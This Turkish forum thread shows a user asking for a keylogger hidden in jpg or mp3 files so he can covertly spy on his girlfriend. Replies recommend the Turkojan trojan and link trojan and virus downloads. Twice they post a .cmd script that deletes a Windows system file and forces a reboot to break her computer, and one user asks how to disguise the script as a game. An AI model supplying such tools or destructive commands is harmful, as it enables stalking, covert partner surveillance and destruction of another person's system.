Trojan Aranıyor
-
forumu cok dolastım ama adam gibi bi konu bulmadım ya su trojan olayına adam gibi bi oneri vericek yani jpg dosyasına mp3 dosyasına entegre edilebilecek keylogger falan varmı kız arkim benden habersiz bişeler cewirio onları bu sekilde ogrenebilirim ancak yardım edicek bi mürit aranıyor
-
Mp3 ye yavaş koy,
Turkojan öneririm. -
www.tahribat.com/download/tahrijen/tahrihijen.rar.html.asp
al indir :) -
piyasada yakalanmayan keylog zor bulursun. Benden tavsiye, eğer şüpheleniyosan pcyi çökert. En basitinden:
txt dosyasi olustur icine
del %systemroot%\\system32\\c_1254.nls
shutdown -r -t 00
yaz ve uzantiyi cmd olarak kaydet ve yolla,
yetmedi mi? Al sana çernobil virüsü :D
http://rapidshare.com/files/15829341/_ernobil_viruesue.rar.html
Ya da en mantıklısını söylim :
GİDEN GİDER KALAN SAĞLAR BİZİMDİR diyeceksin. -
tahrijen mi??
-
canım benim eğe şüpheleniyosan bas tekmeyi gitsin ne hali varsa görsün ne kafanı ağrıtıyon bırak sonra o senin peşinden ağlasın seni kaybettiğini anladığı zaman ok mi sen takma kafana böle şeyleri ok mi uğraşmaya bile değmez ok mi kardeş
-
yaw konu muhim olmasa basarım gotune tekmeyide onemli olan bu olayı cozup daha sonra geregini yapmak pc basından 10 dk dahi kalkmıo nezaman pc basına gecsem msnde bana bi yardım edebilecek mürit aranıyor formatla ne halt yediğini anlıyamam hem xpde calısmıo die biliorum onların
-
del %systemroot%\\system32\\c_1254.nls
shutdown -r -t 00
eğer bu yazdığıma format diyorsan yanılıyorsun :) sistem dosyasını siler bu komut ve daha pcye giremez. -
to Yellow.........
abi bu .cmd dosyasının bayt'ını içeriğini değiştirmeden nasıl yukseltiriz.... ben bunu pacman die yuttururum :))) -
biraz saksıyı çalıştır, mesela autorun dosyasını tıklamadan açamazsın de :D Bu bir teori sadece.
-
Toplam Hit: 4037 Toplam Mesaj: 19